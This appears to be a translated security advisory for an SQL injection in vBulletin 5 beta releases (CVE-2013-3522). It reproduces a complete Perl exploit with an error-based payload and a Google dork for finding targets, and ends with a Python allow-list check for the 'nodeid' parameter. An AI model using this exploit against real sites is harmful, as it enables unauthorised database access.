
vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection Vulnerability

Release date: 2013-12-10
Updated: 2013-12-14

Affected systems:
VBulletin VBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28

Description:
--------------------------------------------------------------------------------
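CVE(CAN) ID: CVE-2013-3522

vBulletin is a powerful, flexible forum software suite that can be fully customized to the operator's needs. The index.php/ajax/api/reputation/vote script in vBulletin does not properly filter the value of the "nodeid" parameter, which allows an attacker to inject into or manipulate SQL queries against the back-end database.

<*Source: Orestis Kourides
 
  Link: http://www.osvdb.org/92031
*>

Test method:
--------------------------------------------------------------------------------
Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

# Exploit Title: vBulletin 5 Beta XX SQLi 0day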
# Google Dork: "Powered by vBulletin&#153; Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq "MSWin32" ? "cls" : "clear";
print "
+===================================================+
|         vBulletin 5 Beta XX SQLi 0day         |
|              Author: Orestis Kourides           |
|           Web Site: www.cyitsec.net           |
+===================================================+
";
 
if (@ARGV != 5) {
    print " Usage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM ";
    exit;
}
 
$host     = $ARGV[0];
$path     = $ARGV[1];
$username = $ARGV[2];
$password = $ARGV[3];
$magicnum = $ARGV[4];
$encpath    = encode_base64("http://".$host.$path);
print "[+] Logging ";
print "[+] Username: ".$username." ";
print "[+] Password: ".$password." ";
print "[+] MagicNum: ".$magicnum." ";
print "[+] " .$host.$path."auth/login ";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( "http://".$host.$path."auth/login",
    [
        "url" => $encpath,
        "username" => $username,
        "password" => $password,
    ],
    Referer => "http://".$host.$path."auth/login-form?url=http://".$host.$path."",
    User-Agent => "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0",
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting ";
my $response = $browser->post( "http://".$host.$path."index.php/ajax/api/reputation/vote",
    [
        "nodeid" => $magicnum.") and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338",
    ],
    User-Agent => "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0",
);
$data = $response->content;
if ($data =~ /(#((\.)|[^\#])*#)/) { print "[+] Version: ".$1 };
print " ";
exit 1;

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

VBulletin
---------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:

http://www.vbulletin.com/
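Since no vendor patch is listed, an interim control is to reject any request to the vote endpoint whose "nodeid" is not a plain integer. The Python check below is an added example, not code from vBulletin or from the original advisory; it assumes node IDs are decimal integers and that the parameter arrives form-encoded in the query string or POST body, and the function names and sample requests are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

VOTE_ENDPOINT = "/ajax/api/reputation/vote"   # path named in the advisory
NODEID_RE = re.compile(r"[0-9]{1,10}")        # assumption: node IDs are decimal integers


def nodeid_verdict(url, body=""):
    """Return 'n/a', 'ok' or 'block' for one request (URL plus form-encoded body)."""
    parts = urlsplit(url)
    if not parts.path.lower().rstrip("/").endswith(VOTE_ENDPOINT):
        return "n/a"
    # nodeid may arrive in the query string or the body; collect from both and
    # keep blank values so an empty nodeid is rejected instead of skipped.
    values = []
    for raw in (parts.query, body):
        values += parse_qs(raw, keep_blank_values=True).get("nodeid", [])
    # Accept exactly one all-digit value. fullmatch() also rejects a trailing
    # newline, and repeated parameters are rejected because the filter and the
    # application could read different copies. A missing nodeid is treated as
    # malformed (assumption).
    if len(values) == 1 and NODEID_RE.fullmatch(values[0]):
        return "ok"
    return "block"


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("/index.php/ajax/api/reputation/vote", "nodeid=1234"),
    ("/index.php/ajax/api/reputation/vote", "nodeid=1234%29+and%28select+1"),
    ("/index.php/ajax/api/reputation/vote", "nodeid=1&nodeid=2%29+AND+%281%3D1"),
    ("/index.php/ajax/api/reputation/vote?nodeid=7", ""),
    ("/index.php/ajax/api/reputation/vote", "vote=1"),
    ("/forum/index.php/ajax/api/node/fetch", "nodeid=1%27"),
]


def scan(samples=SAMPLES):
    """Verdict for each (url, body) pair, in order."""
    return [nodeid_verdict(url, body) for url, body in samples]


if __name__ == "__main__":
    for (url, body), verdict in zip(SAMPLES, scan()):
        print(f"{verdict:5} {url} {body}")
```

The same allow-list rule can be expressed in a reverse proxy or web application firewall in front of the forum; "block" verdicts on this endpoint are also worth alerting on.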